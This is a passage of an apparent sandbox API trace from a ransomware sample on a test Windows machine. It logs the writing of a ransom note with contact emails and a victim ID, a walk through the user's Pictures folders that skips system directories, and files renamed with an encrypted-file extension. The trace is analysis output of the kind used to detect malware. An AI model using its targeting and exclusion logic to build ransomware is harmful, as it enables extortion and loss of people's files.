right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0198.133] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0198.137] CloseHandle (hObject=0x384) returned 1
	[0198.137] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0198.138] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0198.138] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0198.138] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0198.139] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0198.139] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0198.140] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0198.140] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0198.140] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0198.140] CloseHandle (hObject=0x384) returned 1
	[0198.140] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x8f9f7040, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0198.141] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*.*") returned 46
	[0198.141] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0198.141] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*.*", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*") returned 0x2e
	[0198.141] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.141] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="windows") returned 0x0
	[0198.141] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.142] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="boot") returned 0x0
	[0198.142] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.142] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="system volume information") returned 0x0
	[0198.142] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.142] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0198.142] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.142] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="temp") returned 0x0
	[0198.142] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.142] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="program files") returned 0x0
	[0198.143] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.143] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="program files (x86)") returned 0x0
	[0198.143] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.143] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="appdata") returned 0x0
	[0198.143] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.143] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="application data") returned 0x0
	[0198.143] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.144] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="winnt") returned 0x0
	[0198.144] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.144] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="tmp") returned 0x0
	[0198.144] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.144] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="cache") returned 0x0
	[0198.144] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.144] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="temporary internet files") returned 0x0
	[0198.144] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.145] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="webcache") returned 0x0
	[0198.145] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.145] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="inetcache") returned 0x0
	[0198.145] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.145] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="nvidia") returned 0x0
	[0198.145] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.145] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="packages") returned 0x0
	[0198.145] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.146] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="cookies") returned 0x0
	[0198.146] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.146] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="programdata") returned 0x0
	[0198.146] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0198.146] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0198.146] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x8f9f7040, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0198.146] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0198.146] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x2b10dbc5, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0198.146] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f9f7040, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8f9f7040, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8fa1d290, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0198.147] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f9f7040, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8f9f7040, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8f9f7040, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0198.147] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f9f7040, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8f9f7040, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8f9f7040, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0198.147] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0198.147] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0198.147] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0198.147] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e1d32d5, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e1d32d5, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e1d32d5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xae80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="efa5d.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="EFA5DJ~1.SCL")) returned 1
	[0198.147] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e21f681, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e21f681, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e21f681, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc030, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f_d-.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="F_D-BM~1.SCL")) returned 1
	[0198.148] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e26bb13, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e26bb13, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e26bb13, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gbhwyejwrouo.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="GBHWYE~1.SCL")) returned 1
	[0198.148] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2b8265, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e2b8265, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e2b8265, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x7a50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gfn5uwhvoca7ihha.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="GFN5UW~1.SCL")) returned 1
	[0198.148] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2de311, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e2de311, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e304723, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc6c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h-7uuny_qd0.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="H-7UUN~1.SCL")) returned 1
	[0198.148] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891a8d32, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x891a8d32, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8eb5ca05, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0198.148] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8915c7e1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8915c7e1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8eac4172, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0198.148] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e350ad0, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e350ad0, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e376e4a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x159a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kphevwvu--mnrrobfp5d.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="KPHEVW~1.SCL")) returned 1
	[0198.148] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e39cff9, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e39cff9, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e3c32c0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x3fe0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ljd6k_jcpnmqhcg6tihm.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="LJD6K_~1.SCL")) returned 1
	[0198.148] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e3e9480, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e3e9480, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e40f636, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x12c60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lny0-uli.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="LNY0-U~1.SCL")) returned 1
	[0198.148] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e671c41, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e671c41, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e671c41, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x38b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nakuksj-6.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="NAKUKS~1.SCL")) returned 1
	[0198.148] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e6be375, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e6be375, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e6be375, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x14ec0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pfrh0 ehmta6.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="PFRH0E~1.SCL")) returned 1
	[0198.148] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e7307b3, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e7307b3, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e7307b3, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xcd70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="preumk814_qyh888fxol.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="PREUMK~1.SCL")) returned 1
	[0198.148] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e77cd48, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e77cd48, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e7a301a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x14610, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r5m3rr4fp_k2fkf4.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="R5M3RR~1.SCL")) returned 1
	[0198.149] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1
	[0198.149] lstrcmpW (lpString1="Saved Pictures", lpString2="..") returned 1
	[0198.149] lstrcmpW (lpString1="Saved Pictures", lpString2=".") returned 1
	[0198.149] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures"
	[0198.149] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0198.149] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="Saved Pictures" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures"
	[0198.149] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures"
	[0198.149] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\"
	[0198.149] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\"
	[0198.150] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\*.*"
	[0198.150] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0198.226] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\*.*") returned 49
	[0198.226] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0198.227] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\*.*", cchLength=0x31 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*") returned 0x31
	[0198.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.227] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="windows") returned 0x0
	[0198.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.227] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="boot") returned 0x0
	[0198.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.227] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="system volume information") returned 0x0
	[0198.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.228] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0198.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.228] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="temp") returned 0x0
	[0198.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.228] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="program files") returned 0x0
	[0198.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.235] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="program files (x86)") returned 0x0
	[0198.235] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.235] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="appdata") returned 0x0
	[0198.236] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.236] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="application data") returned 0x0
	[0198.236] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.236] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="winnt") returned 0x0
	[0198.236] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.236] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="tmp") returned 0x0
	[0198.236] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.236] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="cache") returned 0x0
	[0198.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.237] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="temporary internet files") returned 0x0
	[0198.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
